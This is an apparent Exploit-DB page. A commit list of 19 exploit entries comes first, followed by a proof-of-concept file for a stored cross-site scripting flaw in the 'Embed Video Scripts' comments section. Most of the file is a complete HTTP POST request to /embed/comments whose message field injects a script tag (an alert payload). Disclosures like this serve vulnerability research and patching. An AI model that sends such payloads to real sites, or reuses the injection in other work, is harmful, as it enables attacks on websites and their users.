deaee53895
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
36 lines
No EOL
1.3 KiB
Text
36 lines
No EOL
1.3 KiB
Text
# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
|
|
# Google Dork: N/A
|
|
# Date: 1 Jan 2019
|
|
# Exploit Author: Deyaa Muhammad
|
|
# Author EMail: contact [at] deyaa.me
|
|
# Author Blog: http://deyaa.me
|
|
# POC Video: https://youtu.be/2CFJLwkxpT8
|
|
# Vendor Homepage: https://codeawesome.in/embed/
|
|
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
|
|
# Demo Website: https://codeawesome.in/embed/
|
|
# Version: N/A
|
|
# Tested on: WIN7_x68/Linux
|
|
# CVE : N/A
|
|
|
|
# Description:
|
|
A stored xss found in "Embed Video Scripts" comments section.
|
|
|
|
# POC Request:
|
|
|
|
:method: POST
|
|
:authority: server
|
|
:scheme: https
|
|
:path: /embed/comments
|
|
content-length: 145
|
|
accept: */*
|
|
origin: https://server
|
|
x-requested-with: XMLHttpRequest
|
|
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|
content-type: application/x-www-form-urlencoded; charset=UTF-8
|
|
accept-encoding: gzip, deflate, br
|
|
accept-language: en-US,en;q=0.9
|
|
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
|
|
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
|
|
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6
|
|
|
|
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png |